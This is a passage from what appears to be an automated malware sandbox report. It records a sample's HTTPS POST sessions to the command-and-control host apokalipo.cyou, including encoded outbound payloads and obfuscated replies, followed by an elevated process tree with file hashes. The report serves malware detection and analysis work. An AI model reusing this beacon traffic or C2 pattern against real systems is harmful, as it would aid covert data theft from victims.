                                                          2024-10-07 05:14:57 UTC1369INData Raw: 3b 35 34 3f 3d 39 38 3f 3c 34 34 3d 3f 35 14 00 d5 05 0b 00 05 04 08 bb bb 05 04 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 4e 7e 6d 7a 69 5b 6d 60 60 69 78 14 00 3e 03 0a 00 19 06 08 bb bb 19 06 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5b 65 62 5f 4f 5c 22 65 62 65 14 00 ab 06 0f 00 fe 0a 08 bb bb fe 0a 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 4f 63 65 62 63 61 65 50 4f 63 65 62 63 61 65 14 00 f3 03 04 00 ee 05 08 bb bb ee 05 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 68 6e 14 00 7d 0a 1e 00 e2 0a 08 bb bb e2 0a 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 61 69 7f 7f 69 62 6b 69 7e 7f 50 48 65 7f 6f 63 7e 68 50 48 69 7a 69 60 63 7c 61 69 62 78 14 00 36 0b 1f 00 0a 02 08 bb bb 0a 02 f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 79 7a 62
                                                          Data Ascii: ;54?=98?<44=?5BC{N~mzi[m``ix>rBC{[eb_O\"ebeOBC{OcebcaePOcebcaeOBC{&"hn}BC{aiibki~PHeoc~hPHizi`c|aibx6BC{yzb
                                                          2024-10-07 05:14:57 UTC1369INData Raw: 65 79 61 53 6e 7e 63 7b 7f 69 7e 7f 14 00 7c 00 05 00 8c 0a 08 bb bb 8c 0a 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 60 63 6b 14 00 8d 07 09 00 4d 0b 08 bb bb 4d 0b f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7f 69 6f 61 63 68 22 68 6e 10 00 38 0b 04 00 d9 09 04 d4 d4 d9 09 4f 42 0d 1d 19 1d 0c 35 be f6 58 3e 69 0f d8 14 00 20 09 23 00 8c 04 08 bb bb 8c 04 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 68 65 7f 6f 63 7e 68 6f 6d 62 6d 7e 75 50 40 63 6f 6d 60 2c 5f 78 63 7e 6d 6b 69 50 60 69 7a 69 60 68 6e 14 00 68 0a 0e 00 23 06 08 bb bb 23 06 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 63 63 67 65 69 7f 22 7f 7d 60 65 78 69 14 00 36 03 1f 00 1c 00 08 bb bb 1c 00 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6a 78 7c 50 4a 65 60 69 56 65 60 60
                                                          Data Ascii: eyaSn~c{i~|BC{&"`ckMMBC{ioach"hn8OB5X>i #BC{heoc~hombm~uP@com`,_xc~mkiP`izi`hnh##BC{occgei"}`exi6rBC{jx|PJe`iVe``
                                                          2024-10-07 05:14:57 UTC1369INData Raw: 60 5a 42 4f 14 00 89 08 01 00 26 06 08 bb bb 26 06 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 10 00 68 09 04 00 b8 03 04 d4 d4 b8 03 88 42 0d 1d 19 1d 0c dd df 80 0a d6 08 79 8a 10 00 7a 09 04 00 b4 02 04 d4 d4 b4 02 88 42 0d 1d 19 1d 0c 83 1c 30 42 89 2a 3c c7 10 00 15 04 04 00 5c 00 04 d4 d4 5c 00 2b 42 0d 1d 19 1d 0c a1 b2 32 22 ab 61 cb a2 14 00 cb 07 08 00 40 05 08 ba ba 40 05 f6 42 0d 1d 19 1d 0c bb 3e bc 17 e6 fc f5 78 c2 ee 47 d9 bf 8d 55 17 14 00 74 05 07 00 ae 01 08 bb bb ae 01 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 79 7f 69 7e 78 6d 6b 10 00 37 08 04 00 39 02 04 d4 d4 39 02 2b 42 0d 1d 19 1d 0c 5f b9 47 84 55 6a be 04 10 00 b3 04 04 00 0f 00 04 d4 d4 0f 00 88 42 0d 1d 19 1d 0c 80 28 86 c6 8a 1e 8a 43 10 00 1f 0b 04 00 06 06 04 d4 d4
                                                          Data Ascii: `ZBO&&OBC{&hByzB0B*<\\+B2"a@@B>xGUtBC{yi~xmk799+B_GUjB(C


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449740188.114.96.3443344C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-07 05:14:57 UTC438OUTPOST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          Content-Length: 53
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:14:57 UTC53OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii:
                                                          2024-10-07 05:14:58 UTC500INHTTP/1.1 200 OK
                                                          Date: Mon, 07 Oct 2024 05:14:58 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gEmhIf9syJ6ik3v4al2ivhvNXtcloAN3kklEITEkxRXLQx9zg4cWdMQFOtk22p9YDCxkMKCXYEA9Tu1gUJvP5YMnqjUYFlXhRaeaeKNz1B856i1Cz28OpfxkFAvEfTxAGw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb691fc9aa41f5-EWR
                                                          2024-10-07 05:14:58 UTC24INData Raw: 31 32 0d 0a 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 90 0d 0a
                                                          Data Ascii: 12
                                                          2024-10-07 05:14:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449741188.114.96.3443344C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-07 05:14:58 UTC439OUTPOST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          Content-Length: 208
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:14:58 UTC208OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 95 00 00 00 08 00 00 00 3c 00 00 00 a2 27 b0 24 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ae 2b bc 28 9e cc 9c 6e 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ae 2b bc 28 5c 47 0a 0a 20 0c 0c 0c 0c 0c 0c 0c 21 0c 21 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 5c 47 0a 0b 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0d 0c 0c 0c 5c 47 09 0a 0c 0c 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 0c 0c f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 f3 40 7b fe a6 09 23 99 c4 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii: <'$+(n+(\G !!\G\G@{#
                                                          2024-10-07 05:14:58 UTC558INHTTP/1.1 204 No Content
                                                          Date: Mon, 07 Oct 2024 05:14:58 GMT
                                                          Connection: close
                                                          op: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aRugRMSHHrm7120bDmLPpPSETiQUMEM6vRRe1bMJ%2Fsa6H36gVQU7XY5cGXupYQfs8ndLCT%2F95IwnFpB%2FVGIC7fFP%2BQm41J%2FJ0pDFOtPR2ZiRqn71uil2QLGdpdTDoCClOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb69253d61427c-EWR


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449973188.114.96.34434960C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-07 05:15:41 UTC367OUTPOST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          Content-Length: 96
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:15:41 UTC96OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 00 2d 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
                                                          2024-10-07 05:15:42 UTC580INHTTP/1.1 200 OK
                                                          Date: Mon, 07 Oct 2024 05:15:42 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          op: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=X8bjh7uZee6EDq%2BpXPHEg%2BY4vfJCMwtDuSI8FmlQ33e1CSky9B8kSPxbp0s5VD9%2Bp6YAPIIkhkG3dzo1g7OLVEHE3WGkb7O2jGtHQvvgcXyb9YZTXez%2B5g%2F1LJONM%2Bl80Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb6a333d5e0f9b-EWR
                                                          2024-10-07 05:15:42 UTC789INData Raw: 33 37 64 65 0d 0a c5 5a 00 00 00 00 00 00 00 00 00 00 40 69 69 27 14 00 60 08 27 00 21 07 08 bb bb 21 07 f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5e 69 6d 60 5a 42 4f 50 7a 62 6f 7a 65 69 7b 69 7e 22 68 50 7c 6d 7f 7f 7b 63 7e 68 7f 22 69 62 6f 61 6d 7f 78 69 7e 14 00 7f 09 34 00 ef 08 08 bb bb ef 08 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 63 61 22 60 65 6e 69 7e 78 75 22 66 6d 74 74 50 45 62 68 69 74 69 68 48 4e 50 6a 65 60 69 53 53 3c 22 65 62 68 69 74 69 68 68 6e 22 60 69 7a 69 60 68 6e 14 00 e4 09 07 00 28 00 08 bb bb 28 00 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 4f 59 5e 5e 49 42 58 10 00 fa 07 04 00 d4 0a 04 d4 d4 d4 0a 3f 42 0d 1d 19 1d 0c ce de 45 da c5 09 bc 5a 10 00 db 02 04 00 88 00 04 d4 d4 88 00 88 42 0d 1d 19 1d 0c 04 fc 2f
                                                          Data Ascii: 37deZ@ii'`'!!BC{^im`ZBOPzbozei{i~"hP|m{c~h"iboamxi~4OBC{oca"`eni~xu"fmttPEbhitihHNPje`iSS<"ebhitihhn"`izi`hn((BC{OY^^IBX?BEZB/
                                                          2024-10-07 05:15:42 UTC1369INData Raw: 9a 99 c4 6e 7e 63 7b 7f 69 7e 22 69 74 69 14 00 56 03 08 00 00 01 08 bb bb 00 01 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7c 7e 63 6a 65 60 69 7f 14 00 63 0b 1c 00 c1 09 08 bb bb c1 09 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6d 78 63 61 65 6f 50 40 63 6f 6d 60 2c 5f 78 63 7e 6d 6b 69 50 60 69 7a 69 60 68 6e 14 00 5d 02 06 00 02 08 08 bb bb 02 08 3f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 63 62 6a 65 6b 10 00 54 05 04 00 64 08 04 d4 d4 64 08 2b 42 0d 1d 19 1d 0c 81 2e 9f cd 8a f9 66 4d 14 00 79 09 06 00 c0 06 08 bb bb c0 06 2c 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 29 58 49 41 5c 29 14 00 07 09 06 00 64 02 08 bb bb 64 02 2c 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 29 58 69 61 7c 29 10 00 f8 08 04 00 89 0a 04 d4 d4 89 0a f6 42 0d 1d 19 1d
                                                          Data Ascii: n~c{i~"itiVBC{|~cje`icOBC{mxcaeoP@com`,_xc~mkiP`izi`hn]?BC{ocbjekTdd+B.fMy,BC{)XIA\)dd,BC{)Xia|)B
                                                          2024-10-07 05:15:42 UTC1369INData Raw: 0d 1d 19 1d 0c 61 e2 14 d3 2a 2f 59 fc 18 32 ef 1d 73 5e f9 93 14 00 90 02 12 00 b6 07 08 bb bb b6 07 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6d 7e 61 63 7e 75 26 7b 6d 60 60 69 78 22 60 61 68 6e 14 00 de 00 0e 00 c2 08 08 bb bb c2 08 2b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 43 7c 69 62 5a 5c 42 50 6f 63 62 6a 65 6b 10 00 03 0b 04 00 2b 09 04 d4 d4 2b 09 4f 42 0d 1d 19 1d 0c f9 42 2a c3 f3 74 26 46 14 00 45 05 0a 00 ec 04 08 bb bb ec 04 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7c 67 6f 7f 3d 3d 22 78 74 78 10 00 bd 07 04 00 1b 02 04 d4 d4 1b 02 4f 42 0d 1d 19 1d 0c 51 fe 28 69 5b c8 24 ec 10 00 38 07 04 00 c9 07 04 d4 d4 c9 07 88 42 0d 1d 19 1d 0c de fe af 86 d5 29 56 06 10 00 2a 0a 04 00 0b 06 04 d4 d4 0b 06 f6 42 0d 1d 19 1d 0c bc 3d 36 bf
                                                          Data Ascii: a*/Y2s^OBC{m~ac~u&{m``ix"`ahn+BC{C|ibZ\BPocbjek++OBB*t&FEBC{|go=="xtxOBQ(i[$8B)V*B=6
                                                          2024-10-07 05:15:42 UTC1369INData Raw: 0c b0 43 7b ee 03 9a 99 c4 7c 7e 63 6a 65 60 69 7f 14 00 93 03 08 00 6e 06 08 bb bb 6e 06 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7c 7e 63 6a 65 60 69 7f 14 00 52 0a 08 00 63 08 08 ba ba 63 08 f6 42 0d 1d 19 1d 0c aa bb 9b d0 62 c9 45 6e d3 6b 60 1e 3b b8 e5 01 14 00 76 02 07 00 b0 07 08 bb bb b0 07 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7b 6d 60 60 69 78 7f 14 00 92 07 19 00 8f 01 08 bb bb 8f 01 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 4a 65 60 69 56 65 60 60 6d 50 7f 65 78 69 61 6d 62 6d 6b 69 7e 22 74 61 60 14 00 61 01 04 00 c7 01 08 bb bb c7 01 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 40 43 4f 47 10 00 e1 02 04 00 93 01 04 d4 d4 93 01 4f 42 0d 1d 19 1d 0c 2e 76 b9 46 24 40 b5 c3 14 00 a2 06 11 00 34 08 08 bb bb 34 08 88 42 0d 1d 19
                                                          Data Ascii: C{|~cje`innBC{|~cje`iRccBbEnk`;vOBC{{m``ixrBC{Je`iVe``mPexiambmki~"ta`aBC{@COGOB.vF$@44B
                                                          2024-10-07 05:15:42 UTC1369INData Raw: 01 04 d4 d4 a5 01 88 42 0d 1d 19 1d 0c ab fb 0d 8f a0 2c f4 0f 14 00 22 06 08 00 0d 00 08 ba ba 0d 00 4f 42 0d 1d 19 1d 0c 4d 9e 37 4b 1d b9 92 f3 34 4e cc 85 44 c8 32 9c 14 00 a8 04 04 00 6d 09 08 bb bb 6d 09 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 40 43 4f 47 14 00 ec 00 21 00 d8 07 08 bb bb d8 07 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6a 78 7c 50 5b 65 62 5f 4f 5c 50 45 62 65 53 4a 65 60 69 7f 50 7f 69 60 69 6f 78 69 68 22 65 62 65 14 00 ef 09 08 00 82 01 08 bb bb 82 01 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 6f 63 62 6a 65 6b 14 00 08 04 26 00 1b 07 08 bb bb 1b 07 4f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7b 6d 60 60 69 78 7f 50 49 7a 69 7e 5f 79 7e 6a 50 40 63 6f 6d 60 2c 5f 78 63 7e 6d 6b 69 50 60 69 7a 69 60 68 6e 14 00 f1
                                                          Data Ascii: B,"OBM7K4ND2mmBC{@COG!rBC{jx|P[eb_O\PEbeSJe`iPi`ioxih"ebeOBC{&"ocbjek&OBC{{m``ixPIzi~_y~jP@com`,_xc~mkiP`izi`hn
                                                          2024-10-07 05:15:42 UTC1369INData Raw: 84 02 ca 57 c3 09 97 01 24 6d 14 00 a9 04 05 00 5f 0b 08 bb bb 5f 0b 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 60 68 6e 14 00 f5 0a 0d 00 f2 06 08 bb bb f2 06 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 40 63 6f 6d 60 2c 5f 78 63 7e 6d 6b 69 10 00 1c 05 04 00 99 05 04 d4 d4 99 05 4f 42 0d 1d 19 1d 0c ae 4c d5 21 a4 9b 2c a1 14 00 a9 0a 05 00 c7 0a 08 bb bb c7 0a f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 60 6e 60 14 00 a0 04 09 00 b4 03 08 bb bb b4 03 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 40 63 6b 65 62 48 6d 78 6d 14 00 44 0a 0e 00 f0 02 08 bb bb f0 02 2c 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 29 5c 7e 63 6b 7e 6d 61 4a 65 60 69 7f 29 14 00 33 08 17 00 a0 02 08 bb bb a0 02 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6a 78 7c
                                                          Data Ascii: W$m__BC{&"`hnBC{@com`,_xc~mkiOBL!,BC{&"`n`BC{@ckebHmxmD,BC{)\~ck~maJe`i)3rBC{jx|
                                                          2024-10-07 05:15:42 UTC1369INData Raw: ee 03 9a 99 c4 64 6d 7e 68 7b 6d 7e 69 14 00 13 00 20 00 dd 05 08 bb bb dd 05 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 68 65 7f 6f 63 7e 68 7c 78 6e 50 40 63 6f 6d 60 2c 5f 78 63 7e 6d 6b 69 50 60 69 7a 69 60 68 6e 14 00 ec 07 08 00 f3 04 08 ba ba f3 04 f6 42 0d 1d 19 1d 0c 6f f8 8b 82 52 8a 99 22 17 28 70 4c 0b fb 39 4d 14 00 ec 02 0a 00 a5 0b 08 bb bb a5 0b 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 69 74 78 69 62 7f 65 63 62 7f 14 00 41 09 11 00 ae 06 08 bb bb ae 06 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6f 64 7e 63 61 65 79 61 53 6e 7e 63 7b 7f 69 7e 7f 10 00 3a 09 04 00 99 01 04 d4 d4 99 01 4f 42 0d 1d 19 1d 0c 2b ef 4e 21 21 38 b7 a1 14 00 99 08 05 00 bd 04 08 bb bb bd 04 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 26 22 60 68 6e 14 00
                                                          Data Ascii: dm~h{m~i BC{heoc~h|xnP@com`,_xc~mkiP`izi`hnBoR"(pL9MBC{itxibecbABC{od~caeyaSn~c{i~:OB+N!!8BC{&"`hn
                                                          2024-10-07 05:15:42 UTC1369INData Raw: 00 38 08 04 00 c9 00 04 d4 d4 c9 00 4f 42 0d 1d 19 1d 0c 36 d0 fb 36 3c 07 02 b6 14 00 c1 03 0c 00 0c 01 08 bb bb 0c 01 f0 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7c 7e 63 6a 65 60 69 7f 22 65 62 65 10 00 0c 00 04 00 e8 05 04 d4 d4 e8 05 0b 42 0d 1d 19 1d 0c d2 02 4f 9a d8 d1 b6 1a 14 00 0b 07 2d 00 1f 00 08 bb bb 1f 00 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 6a 78 7c 50 5b 65 62 5f 4f 5c 50 45 62 65 53 4a 65 60 69 7f 50 60 63 6f 6d 60 4d 7c 7c 48 6d 78 6d 5c 7e 63 6b 7e 6d 61 7f 22 65 62 65 10 00 14 05 04 00 29 02 04 d4 d4 29 02 f6 42 0d 1d 19 1d 0c c2 7e 45 e0 98 6a bc 60 14 00 e7 03 20 00 98 02 08 bb bb 98 02 3f 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5f 43 4a 58 5b 4d 5e 49 50 5b 43 5b 3a 38 3f 3e 42 63 68 69 50 5a 6d 60 7a 69 50 5f 78 69 6d
                                                          Data Ascii: 8OB66<BC{|~cje`i"ebeBO-rBC{jx|P[eb_O\PEbeSJe`iP`com`M||Hmxm\~ck~ma"ebe))B~Ej` ?BC{_CJX[M^IP[C[:8?>BchiPZm`ziP_xim
                                                          2024-10-07 05:15:42 UTC1369INData Raw: 7a 65 69 7b 69 7e 22 68 50 7c 6d 7f 7f 7b 63 7e 68 7f 22 66 7f 63 62 14 00 c2 01 16 00 84 04 08 bb bb 84 04 0b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 61 69 7f 7f 69 62 6b 69 7e 7f 50 48 65 7f 6f 63 7e 68 50 5c 78 6e 14 00 47 07 07 00 bd 06 08 bb bb bd 06 f6 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 7c 7e 65 7a 6d 78 69 14 00 73 00 13 00 92 01 08 bb bb 92 01 2b 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 43 7c 69 62 5a 5c 42 50 6f 63 62 6a 65 6b 21 6d 79 78 63 14 00 8f 0b 18 00 f5 03 08 bb bb f5 03 88 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 40 63 6f 6d 60 2c 49 74 78 69 62 7f 65 63 62 2c 5f 69 78 78 65 62 6b 7f 14 00 c6 05 29 00 cd 06 08 bb bb cd 06 72 42 0d 1d 19 1d 0c b0 43 7b ee 03 9a 99 c4 5f 63 6a 78 7b 6d 7e 69 50 41 6d 7e 78 65 62 2c 5c 7e 65 67
                                                          Data Ascii: zei{i~"hP|m{c~h"fcbBC{aiibki~PHeoc~hP\xnGBC{|~ezmxis+BC{C|ibZ\BPocbjek!myxcBC{@com`,Itxibecb,_ixxebk)rBC{_cjx{m~iPAm~xeb,\~eg


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.449979188.114.96.34434960C:\Users\user\AppData\Local\Temp\validPower_Lnz_x64.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-10-07 05:15:42 UTC438OUTPOST /watchvideo-sheila-avis-de-recherche-191280-2770205.html?xevok9zcbyqunjb=ZzsLLytC%2FMtKEkDEIiMG%2BNOJ3DYSue3YuBdMbTrtqKKdsg%2BC%2Fobe9lLJF33efnkG HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
                                                          title: QjJpYf7JSNeFgfzDoE7rEVRGSvoCuywFgi99gSR9vR/CKS5/bTBtoujmY2Yutg
                                                          Content-Length: 53
                                                          Host: apokalipo.cyou
                                                          2024-10-07 05:15:42 UTC53OUTData Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 03 02 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                          Data Ascii:
                                                          2024-10-07 05:15:43 UTC508INHTTP/1.1 200 OK
                                                          Date: Mon, 07 Oct 2024 05:15:43 GMT
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8LXzDY1TXizbHqC7SlFF0f2n3gIrWYy%2F5kD40hHVq4XwqVhbcxX6lqfpWfmJUoZnm41WIt9JRG1oAJjlH4K94%2BP%2FIloXNnO5JG0H9OfENgY1%2BW1f4tq43QyleTwbyFjarA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8ceb6a396dbe42ad-EWR
                                                          2024-10-07 05:15:43 UTC29INData Raw: 31 37 0d 0a 07 00 00 00 00 00 00 00 00 00 00 00 fe ff ff ff 91 91 ce 24 b0 27 a2 0d 0a
                                                          Data Ascii: 17$'
                                                          2024-10-07 05:15:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Statistics

                                                          CPU Usage

                                                          Click to jump to process

                                                          Memory Usage

                                                          Click to jump to process

                                                          High Level Behavior Distribution

                                                          Click to dive into process behavior distribution

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Target ID:0
                                                          Start time:01:14:05
                                                          Start date:07/10/2024
                                                          Path:C:\Users\user\Desktop\KClGcCpDAP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\KClGcCpDAP.exe"
                                                          Imagebase:0x870000
                                                          File size:8'656'211 bytes
                                                          MD5 hash:61D2BAF57C3ED6EDA2D72720FC54ED04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:1
                                                          Start time:01:14:06
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Windows\Temp\{F5D68338-3B04-47F6-AE14-10EB1750048C}\.cr\KClGcCpDAP.exe" -burn.clean.room="C:\Users\user\Desktop\KClGcCpDAP.exe" -burn.filehandle.attached=524 -burn.filehandle.self=544
                                                          Imagebase:0xd00000
                                                          File size:8'631'353 bytes
                                                          MD5 hash:4ED56BCA0F099784A4A341321C3D0695
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Antivirus matches:
                                                          • Detection: 8%, ReversingLabs
                                                          Reputation:low
                                                          Has exited:true

                                                          General

                                                          Target ID:2
                                                          Start time:01:14:06
                                                          Start date:07/10/2024
                                                          Path:C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\Temp\{8CB9D4BD-BB58-4C1B-96C8-872261C205E0}\.ba\Virtual.exe"
                                                          Imagebase:0x7ff6c5670000
                                                          File size:3'559'696 bytes
